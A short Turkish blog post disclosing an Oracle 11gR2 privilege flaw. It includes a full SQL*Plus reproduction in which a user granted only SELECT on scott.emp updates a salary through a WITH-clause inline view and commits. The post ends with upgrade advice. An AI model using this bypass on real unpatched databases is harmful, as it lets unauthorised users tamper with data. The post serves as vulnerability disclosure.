Update yetkisi olmadan tablo güncelleme

1 Eyl by Ahmet Duruöz

Update yetkisi olmadan tablo güncelleme

11gr2 versiyonlarında test ettiğim bir sorundan bahsedeceğim. Bir tabloda select hakkı olan her kullanıcı o tabloyu güncelleyebiliyor. Nasıl mı ?

Aşağıdaki adımları veritabanınında deneyebilirsiniz. Güncelleme yapıldığını göreceksiniz.

 

 

[oracle@oradb ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.3.0 Production on Wed May 6 16:08:48 2015

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> create user test identified by test;

User created.

SQL> grant create session,create table to test;

Grant succeeded.

SQL> grant select on scott.emp to test;

Grant succeeded.

SQL> exit
Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
[oracle@oradb ~]$ sqlplus test/test

SQL*Plus: Release 11.2.0.3.0 Production on Wed May 6 16:10:05 2015

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1500 where ename='ALLEN';

1 row updated.

SQL> commit;

Commit complete.

 

 

Bu güvenlik açığını gidermek için 11.2.0.4.5 (en son yama seviyesi ve SPU içeren) yada daha ileri bir versiyonuna yükseltin.

Loading

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir